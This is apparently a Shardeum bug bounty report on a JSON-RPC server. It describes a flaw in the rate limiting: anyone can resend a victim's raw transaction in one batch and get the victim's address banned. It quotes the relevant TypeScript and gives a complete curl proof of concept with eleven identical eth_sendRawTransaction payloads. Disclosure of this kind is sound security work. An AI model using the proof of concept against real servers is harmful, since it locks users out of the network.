#39623 [W&A-Low] Blocking the victim's account address from sending transactions via JSON-RPC

Submitted on Feb 3rd 2025 at 16:08:02 UTC by @anton_quantish for Audit Comp | Shardeum: Ancillaries III

Report ID: #39623
Report Type: Websites and Applications
Report severity: Low
Target: https://github.com/shardeum/json-rpc-server/tree/itn4
Impacts:
- Temporarily disabling user to access target site, such as:
Locking up the victim from login
Cookie bombing, etc.

Description

Brief/Intro

It's possible to block the victim's account address so he won't be able to send any tx via JSON-RPC.

Vulnerability Details

When the JSON-RPC request comes in, it passes through the rateLimit.ts middleware first and then every method call is checked via checkRequest(ip, request) function. Finally, the rate limits are checked within the utils.ts:isRequestOkay function.

In case of executing the eth_sendRawTransaction method, one of the checks performed is how often the tx sender (account address) calls this method. If it's too often (> 10 calls per a minute in default config), the request will be cancelled and the sender is marked as abused https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L1097-L1109

if (config.rateLimit && config.rateLimitOption.limitFromAddress) {
  if (fromAddressHistory && fromAddressHistory.length >= 10) {
    if (now - fromAddressHistory[fromAddressHistory.length - 10] < oneMinute) {
      if (verbose) console.log(`Your address ${readableTx.from} injected 10 txs within 60s`)
      if (config.recordTxStatus)
        createRejectTxStatus(
          bufferToHex(transaction?.hash() as Buffer),
          'Rejected by JSON RPC rate limiting',
          ip
        )
      this.addAbusedAddress(readableTx.to, readableTx.from as string, ip)
      this.addAbusedSender((readableTx.from as string).toLowerCase())
      return false  // isRequestOkay return value, so the request cancelled
    }
  }
}

Moreover, every 2 minutes (by default) the top 10 most abusing senders are getting blacklisted so they are permanently blocked from sending transactions (in checkAndBanSpammers function): https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L823-L836

const mostAbusedSendersSorted: { address: string; count: number }[] = Object.values(
      this.abusedSenders
    ).sort(
      (a: { address: string; count: number }, b: { address: string; count: number }) => b.count - a.count
    )
    console.log('Top 10 spammer addresses: ', mostAbusedSendersSorted.slice(0, 10))
    for (const spammerInfo of mostAbusedSendersSorted) {
      if (spammerInfo.count > allowedTxRate && config.rateLimit && config.rateLimitOption.banSpammerAddress) {
        this.addSenderToBacklist(spammerInfo.address)
        console.log(
          `Caller ${spammerInfo.address} is added to spammer list due to sending more than ${allowedTxRate} txs within 5 min.`
        )
      }
    }

The attack possible is that attacker can re-send arbitrary victim's transactions here to get the victim's account address banned so he won't be able to submit his own transactions anymore.

Impact Details

The victim is not able to send transactions via JSON-RPC anymore.

Is it absolutely possible to get the victim's address banned on every public JSON-RPC server since the attack requires just a single request for even JSON-RPC server. This will block a victim from using the Shardeum network at all.

Proof of Concept

While JSON-RPC is running, get any raw tx of some victim and make the following request with CURL:

curl http://172.16.205.128:8080 -XPOST -H 'Content-Type: application/json' --data '[{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]}]'

There're 11 the same transactions in the single batch. This single request is the only needed to get the sender address banned. You will see in JSON-RPC server log that

adding abused sender 0x7f39a55849ff447813557946fe387861784aadca

Then you can try to send any other transaction from the victim's address and you will see they are soft-rejected.

Network is currently busy. Please try again later.

Previous#39109 [W&A-Insight] syncStateDataGlobals will not work, effectively DoS'ing nodes Next39626 [W&A-Critical] malicious validator can overwrite any cycle data

Was this helpful?